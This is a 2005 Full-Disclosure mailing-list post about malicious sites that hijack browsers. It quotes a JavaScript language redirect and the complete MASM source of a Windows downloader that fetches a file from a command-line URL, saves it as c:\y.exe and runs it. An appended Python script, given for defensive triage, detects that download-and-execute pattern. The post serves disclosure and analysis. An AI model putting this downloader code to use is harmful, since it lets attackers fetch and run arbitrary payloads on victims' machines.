[Full-Disclosure] browser hijack by apache sites
- From: thijs at dalhuijsen.com (Matthijs Dalhuijsen)
- Subject: [Full-Disclosure] browser hijack by apache sites
- Date: Thu Mar 24 03:38:44 2005
On 24-May-04, at 14:46, Feher Tamas wrote:

>> http://www.b00gle.com/fa/?d=get

good thing the internet has a memory :)

http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/tool.html+&hl=en

http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/
show the same files, as if copied in a for loop

I especially liked 2 files in the dir;

counter.htm containing the extremely funny

<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>

but then I saw this:

http://www.pizdato.biz/acc10/2DimensionOfExploits.asm

Hehehe, Open Source is getting big!, didn't see no GPL licence so I hope
I'm not violating someone's copyright by posting this here,....

.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data
szLibrary db "urlmon.dll",0
szFunction db "URLDownloadToFileA",0
szFileName db "c:\y.exe", 0

.code
start:
invoke GetCommandLineA
add ax, 0Ah
lea ecx, [eax]
push ecx
invoke LoadLibrary, addr szLibrary
invoke GetProcAddress, eax, addr szFunction
pop ecx
push 0
push 0
lea ebx, [szFileName]
push ebx
push ecx
push 0
call eax
invoke WinExec, addr szFileName, 1
invoke ExitProcess, NULL
end start

Yet I do feel a bit suspicious about this set of files;,... bit TOO
educating I think ;)

cheers!

thijs

--
If I had 6 hours to chop down a tree, I'd spend the first four
sharpening the axe. -- Abraham Lincoln
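
Added example, not part of the original post: the listing above resolves URLDownloadToFileA through LoadLibrary/GetProcAddress, so the name sits in the data section as a plain string instead of in the import table, and a triage check has to scan strings rather than imports. The function names and both byte samples below are constructed for illustration, the first from the three strings in the listing's .data section.

```python
import re

# Printable-ASCII runs of 4+ bytes, the same idea as the `strings` utility.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# An executable written directly into a drive root, e.g. c:\y.exe.
ROOT_EXE = re.compile(r"(?i)^[a-z]:\\[^\\]+\.exe$")


def extract_strings(blob: bytes) -> list:
    """Return every printable-ASCII run found in a binary blob."""
    return [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]


def triage(blob: bytes) -> dict:
    """Flag the download-then-run pattern from strings alone."""
    strings = extract_strings(blob)
    lowered = [s.lower() for s in strings]
    findings = {
        # Library name handed to LoadLibrary at run time.
        "loads_urlmon": any("urlmon.dll" in s for s in lowered),
        # API name handed to GetProcAddress; covers the A and W variants.
        "resolves_downloader": any("urldownloadtofile" in s for s in lowered),
        # Hard-coded drop location for the fetched file.
        "exe_paths": [s for s in strings if ROOT_EXE.match(s)],
    }
    findings["download_and_execute"] = (
        findings["loads_urlmon"]
        and findings["resolves_downloader"]
        and bool(findings["exe_paths"])
    )
    return findings


# Constructed sample: NUL-terminated strings as they would sit in .data.
SAMPLE_DATA = b"\x00\x00urlmon.dll\x00URLDownloadToFileA\x00c:\\y.exe\x00\x90\x90"
# Constructed benign sample for comparison.
BENIGN_DATA = b"\x00kernel32.dll\x00ExitProcess\x00Hello, world\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_DATA), ("benign", BENIGN_DATA)):
        print(name, triage(blob))
```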